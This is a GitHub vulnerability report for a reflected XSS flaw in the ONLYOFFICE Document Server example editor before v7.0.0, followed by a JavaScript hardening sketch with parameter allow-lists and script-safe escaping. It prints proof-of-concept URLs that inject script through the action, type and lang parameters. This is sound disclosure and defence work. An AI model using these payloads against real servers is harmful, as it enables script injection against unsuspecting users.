[Vulnerability Report] XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 allows remote attackers to inject arbitrary HTML or JavaScript
#252
Closed
Bruce-C1 opened this issue
Jan 28, 2022
· 1 comment
· Fixed by #253
In this scenario, the example is used to exploit this vulnerability, but it is a code example of a Document Management System that is used for testing purposes only and is not used in a production environment.
Document Server's example is disabled by default and is not accessible without enabling it first.
There is no such vulnerability present in a fully-fledged and integrated Document Server.
Vulnerability Summary
XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 allows remote attackers to inject arbitrary HTML or JavaScript.
Vulnerability Url
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability Description
The XSS vulnerability is in several parameters of the path ‘/example/editor’ in ONLYOFFICE Document Server before v7.0.0.
Test Server Version: 7.0.0 Build:132
Steps To Reproduce
Vulnerability param: action
Vulnerability URL:
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability param: type
Vulnerability URL:
http://server.domain/example/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability param: lang
Vulnerability URL:
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability Solution
Close the test example in Document Server
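A server-side hardening sketch for the three reported parameters, added here as an example; it is not code from the ONLYOFFICE project or from the fix in #253. It assumes the values are reflected into an inline script block, and the allow-lists, the `lang` format, and the function names are all hypothetical.

```javascript
// Added example: validate reflected query parameters, then serialize them
// safely for an inline <script>. Allow-lists are assumed values, not the project's.
const ALLOWED = {
  action: new Set(["edit", "view", "review"]),      // assumed values
  type: new Set(["desktop", "mobile", "embedded"]), // assumed values
};
const LANG_RE = /^[a-z]{2}(-[A-Z]{2})?$/;            // assumed format: "en", "pt-BR"

// Return the parameter if it is valid, otherwise a fixed default.
// Raw input is never echoed back.
function cleanParam(name, value, fallback) {
  if (typeof value !== "string") return fallback;   // undefined, or array from ?a=1&a=2
  if (name === "lang") return LANG_RE.test(value) ? value : fallback;
  const set = ALLOWED[name];
  return set instanceof Set && set.has(value) ? value : fallback;
}

// JSON.stringify alone is not enough inside <script>: the HTML parser ends the
// element at "</script>" even when it sits inside a JavaScript string literal.
function toInlineScriptJson(data) {
  return JSON.stringify(data)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Build the inline configuration block from the request query object.
function renderEditorConfig(query) {
  const cfg = {
    action: cleanParam("action", query.action, "edit"),
    type: cleanParam("type", query.type, "desktop"),
    lang: cleanParam("lang", query.lang, "en"),
  };
  return "<script>var config = " + toInlineScriptJson(cfg) + ";</script>";
}

// Constructed input: the URL-decoded value from the report's action parameter.
const reported = '19319874"></script><script>alert(/xss/)</script>';
console.log(renderEditorConfig({ action: reported, type: "mobile", lang: reported }));
console.log(toInlineScriptJson({ fileName: reported }));
```

Validation handles the parameters with a closed set of values; the escaping step covers free-form values such as file names that cannot be allow-listed.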